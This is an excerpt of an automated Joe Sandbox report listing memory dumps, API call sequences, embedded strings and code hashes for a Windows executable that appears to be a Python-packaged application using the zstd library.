                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction ID: d918e8db599752cf29f9031b10db7a9b60d58ced6bfa92792ba38df8122a5c67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11B132B1DB419AE750AB02E854339F2A0FB88BE5F854234DA1DA77A4CF3CD9548710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$AttrErr_ImportImport_ModuleNoneObject_String
                                                                                                                                                                                                            • String ID: UnsupportedOperation
                                                                                                                                                                                                            • API String ID: 984930576-3339004128
                                                                                                                                                                                                            • Opcode ID: 339b4378c8d7f0ae21abf7204bd6bee0c54fc0e9b5e9f5dd2cf395117315f77f
                                                                                                                                                                                                            • Instruction ID: b77dd82fa23798dfe21f992cd61467b99c55834c191dd9b69005da913ee30e65
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 339b4378c8d7f0ae21abf7204bd6bee0c54fc0e9b5e9f5dd2cf395117315f77f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F03A21E1BF43A2EF189F65A95913C63A1EF65BD1F080035DA1E063E4EF3CE1A59324
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSectionfreemallocmemset$EnterLeave
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2095983230-0
                                                                                                                                                                                                            • Opcode ID: b998347c00ed0ece3a0776c08e73774095dc386f363ecd7911bcd7741898d21f
                                                                                                                                                                                                            • Instruction ID: e860caef3ba4ded67d5e5e75629b692b5ada72b735f30d73d2cda26d23c7b1c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b998347c00ed0ece3a0776c08e73774095dc386f363ecd7911bcd7741898d21f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD14132A19B85D7EA69CF35E5403A9B3A0FB99794F049625DF9E03651DF38F1A0C700
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2059522720-0
                                                                                                                                                                                                            • Opcode ID: 448076783abad2c2f56cfc3b1ac18c58d7ec552c2373f9e72f70daef34c05903
                                                                                                                                                                                                            • Instruction ID: a09bae998e01fd89f2d5ef691dbc7b77e9d85c79c382018359ebb7044559ae20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 448076783abad2c2f56cfc3b1ac18c58d7ec552c2373f9e72f70daef34c05903
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99615872605B9592EA62CF12E8557AAB3A8FB68BC0F494435DF8E47B54EF7CD080C314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2059522720-0
                                                                                                                                                                                                            • Opcode ID: 106ad08137d43433c8a47fb976de357f67351b8c3d41f25302bf9f32669dde97
                                                                                                                                                                                                            • Instruction ID: 8213592d30b113dcfb1bfb588e92077cd85c14a605437658d01f92320e0fe2ad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 106ad08137d43433c8a47fb976de357f67351b8c3d41f25302bf9f32669dde97
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3512772606B4192EA66CF22F9453AAB3A5FB58BC4F184435DF8E47B54EF38D094C314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2059522720-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalInitializeSection$ConditionDeleteVariablecallocfreememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 809434779-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _aligned_free_aligned_malloc$callocfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2511558924-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalInitializeSection$ConditionDeleteVariablecallocfreememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 809434779-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A6D7
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A70D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A73A
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A74B
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A75C
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A777
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                            • API String ID: 851805269-3733052814
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction ID: 5fee9a97739454e2354908f6f28e05c8ea2689a6e792ba32351f65357aa05bc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F951F333A0E682A6E714EF15E500A39B395FB41B89F929171DA4F23758DF3CE841C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                            • Opcode ID: 7d82fb9080f08f38887541d796cd93f6b84f8101b6940601e1502b8de02da7d5
                                                                                                                                                                                                            • Instruction ID: 56cec77e9a2617d97f894f5298dad615abcca14ae5f44ad646a0ee4f0f976c5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d82fb9080f08f38887541d796cd93f6b84f8101b6940601e1502b8de02da7d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35316E3260E68299EB24EB61E8551F9B360FF88784F850135EA4D5BB65DF3CD1058710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$DeallocErr_FormatRestoreSave
                                                                                                                                                                                                            • String ID: zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 297743732-2766032700
                                                                                                                                                                                                            • Opcode ID: 46db9aaf1c3cd0d54b271ae7e4578a149ee9a067833423865fe30fa87db66738
                                                                                                                                                                                                            • Instruction ID: 1f314130b24976d81b9f2e6c90d8276fe268bce1fb57e068269d0a0e1abb6dcb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46db9aaf1c3cd0d54b271ae7e4578a149ee9a067833423865fe30fa87db66738
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1315023A06F5196EA548B75E8443AA63A0FB49BE4F444232CF6E47790DF7CE4A2D304
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$DeallocErr_FormatRestoreSavememmove
                                                                                                                                                                                                            • String ID: zstd decompress error: %s
                                                                                                                                                                                                            • API String ID: 3058629171-3499397093
                                                                                                                                                                                                            • Opcode ID: f26f5b207dafcee2f4d68278a66905dc42ade9652660c986430f7571b3a9872c
                                                                                                                                                                                                            • Instruction ID: 1d8d4332f7d329f09bde2d0daf91aba7f70f467ce78448fa36239940f8efe694
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f26f5b207dafcee2f4d68278a66905dc42ade9652660c986430f7571b3a9872c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0231D422B0AB81A6DB54CF35E84036DB360FB89BD4F540232EB6D47795DF39E4A18704
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF7ACE82748
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                                            • Opcode ID: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction ID: e6f6eee56f05c49682eca42b02838a8d575fce1fde839ec727a98d34bd44ebd7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531527262EBC2A1E630AB10E4517EAB364FF84785FC14036E68D276A9DF3CD255CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Object_String
                                                                                                                                                                                                            • String ID: data is NULL$offset in segments overflows buffer size$segments is NULL
                                                                                                                                                                                                            • API String ID: 2350702593-1550997492
                                                                                                                                                                                                            • Opcode ID: 68d6c774a6c90b809a900000a599135eb9a48d9ad810b4909557f20127a8a5a6
                                                                                                                                                                                                            • Instruction ID: a3e57b8ba21d82feb9bcbd9bf63de89017c2a9754875ec9e2c14c4b637cb3783
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d6c774a6c90b809a900000a599135eb9a48d9ad810b4909557f20127a8a5a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23219C22E1AB8292EA50CF24E44027C77A4FB99BC0F599271EA4D537A5DF7CE591C300
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A80021CA), ref: 00007FF8A800480C
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8004828
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A80021CA), ref: 00007FF8A8004832
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A80021CA), ref: 00007FF8A800483B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • WARNING: The maximum dictionary size %u is too large compared to the source size %u! size(source)/size(dictionary) = %f, but it should be >= 10! This may lead to a subpar dictionary! We recommend training on sources at least 10x, and preferably 100x the size o, xrefs: 00007FF8A800481E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintf
                                                                                                                                                                                                            • String ID: WARNING: The maximum dictionary size %u is too large compared to the source size %u! size(source)/size(dictionary) = %f, but it should be >= 10! This may lead to a subpar dictionary! We recommend training on sources at least 10x, and preferably 100x the size o
                                                                                                                                                                                                            • API String ID: 3491404577-2467106354
                                                                                                                                                                                                            • Opcode ID: d823cdb00c502131a868b293c66d52049f2d2f570bc7fe9caf54b2663e797bc0
                                                                                                                                                                                                            • Instruction ID: 4db5f96665d82b1576c3ec654e6b9e058fbfc0574a849d5f3c03d6c9583ef2cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d823cdb00c502131a868b293c66d52049f2d2f570bc7fe9caf54b2663e797bc0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59113A11B1AE4155ED079725A015376D225FF96BC4F059335DD0F237D1EF3CA0614218
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$AttrCallMethod_SizeString
                                                                                                                                                                                                            • String ID: close$close$flush
                                                                                                                                                                                                            • API String ID: 1920181940-1798861123
                                                                                                                                                                                                            • Opcode ID: 3862c496a2c4cf2f1d781dd167bc6329b7fa57831657d8c94fbd03a1a89cc246
                                                                                                                                                                                                            • Instruction ID: 3b0c857ee2fcd8379d2446943a9748280945d0ecd74336602ed9169f471c535d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3862c496a2c4cf2f1d781dd167bc6329b7fa57831657d8c94fbd03a1a89cc246
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88015262A06A06A1FF144F35D89577837A0EB64BC8F444031C91D063E0DFBDE5E6D354
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$AttrCallMethod_SizeString
                                                                                                                                                                                                            • String ID: close$close$flush
                                                                                                                                                                                                            • API String ID: 1920181940-1798861123
                                                                                                                                                                                                            • Opcode ID: a7cf4166dbfd22ab2755f2040d96e51c999b4a7064d51bebe70c81116ae3bedc
                                                                                                                                                                                                            • Instruction ID: 92e72886fcb58b8a713e38098e357a5ff587e9d018e4d331b11660267257b775
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cf4166dbfd22ab2755f2040d96e51c999b4a7064d51bebe70c81116ae3bedc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3015E61A0AA02A5FF508F76D8A533823A0EB18BCCF441034C90D063A4DFBDE5E9DB54
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AttrErr_Object_
                                                                                                                                                                                                            • String ID: flush$flush$stream is closed
                                                                                                                                                                                                            • API String ID: 4053589530-2062273305
                                                                                                                                                                                                            • Opcode ID: 4b83381c8c89c131117e464fbb97b27c4c133075c8f1f37fb81f47585cc3d061
                                                                                                                                                                                                            • Instruction ID: af457d74c1b9b5e82108899ce34210cc4ddf77f0283476d3851828494b05491a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b83381c8c89c131117e464fbb97b27c4c133075c8f1f37fb81f47585cc3d061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0201FB61E0AA06A5EF148B66ECA133423A0EF58BD8F455035C90D4A2A0DF7CE5EAD758
                                                                                                                                                                                                            APIs
